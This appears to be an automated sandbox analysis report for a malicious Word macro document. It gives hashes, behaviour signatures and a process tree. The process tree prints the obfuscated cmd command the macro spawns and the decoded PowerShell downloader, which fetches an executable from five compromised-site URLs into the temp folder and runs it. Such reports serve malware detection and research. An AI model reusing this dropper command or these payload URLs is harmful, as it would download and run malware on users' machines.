Overview

overview

10

Static

static

1

24bb76ad6a...18.doc

windows7-x64

10

24bb76ad6a...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    08-05-2024 11:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    24bb76ad6a9367820337836451600353_JaffaCakes118.doc

  • Size

    222KB

  • MD5

    24bb76ad6a9367820337836451600353

  • SHA1

    a70c576c9f1360a7f90fb1ba34f9793803952601

  • SHA256

    1f8b157a1ffc5053b9aff97ef49879b777f81f0a5ace7c481eefe9bdceb3cd18

  • SHA512

    827da66c5b3789c0a9365bcb1748483352a86b0cd9f8ddce4ab75091c957f59b0244fdf84f6436f946bd37d5a44a0c06d1f3cd28aa4b0c06b623c871fe0fd295

  • SSDEEP

    3072:ZtUxagq58ghpPyjL/xSu90OoiLuDKZXfwKeljR1C:ZtUxagqOgvPAxUOmD+XfwLu

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\24bb76ad6a9367820337836451600353_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2616
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\jvjqq\auozn\ffhwnvv\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| %TMP:~-8,-7%%CommonProgramFiles:~19,1%%LOCALAPPDATA:~-10,-9% "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2208
      • C:\Windows\SysWOW64\cmd.exe
        CmD /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| c8D "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $wdrbkki='quqzl';$kdjvjlh=new-object Net.WebClient;$mklff='http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k@http://www.vario-reducer.com/wp-content/bGkoUUavZySGn@http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N@http://mingroups.vn/NYV82LSYWEs_s1@http://www.ontamada.ru/RDUstD0DxgOP'.Split('@');$zwort='llvmi';$wzduil = '70';$qjtsvlc='jtjlzjp';$rskct=$env:temp+'\'+$wzduil+'.exe';foreach($conqzdd in $mklff){try{$kdjvjlh.DownloadFile($conqzdd, $rskct);$vuizpab='ppzaw';If ((Get-Item $rskct).length -ge 40000) {Invoke-Item $rskct;$djjscvz='izoplc';break;}}catch{}}$jfjktqs='fmmzjwj';"
          4⤵
            PID:796
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:1576

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
        Filesize

        20KB

        MD5

        340944cb50cb0de772be28d3aa87a815

        SHA1

        fc256195e9a2d94bfe1c1ea24c4e3c796b1c3990

        SHA256

        d7367d28557acd8ca65937af52dfd0db70825160a76f3014504294aa5708dc24

        SHA512

        04e49b7255d35e919042ac94fa9bbdfda2f9968e6d077940269d146d7e1d126e36417750a550809035532e556ca5bc0a00dd8eca662e43e21c53fd38b41e9044

        Download Submit

      • memory/2616-62-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-16-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-25-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-78-0x000000007152D000-0x0000000071538000-memory.dmp

        Filesize

        44KB

        Download

      • memory/2616-72-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-71-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-39-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-0-0x000000002F091000-0x000000002F092000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2616-106-0x000000007152D000-0x0000000071538000-memory.dmp

        Filesize

        44KB

        Download

      • memory/2616-2-0x000000007152D000-0x0000000071538000-memory.dmp

        Filesize

        44KB

        Download

      • memory/2616-70-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-79-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-80-0x00000000068F0000-0x00000000069F0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-81-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-83-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2616-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2616-105-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2616-47-0x0000000006370000-0x0000000006470000-memory.dmp

        Filesize

        1024KB

        Download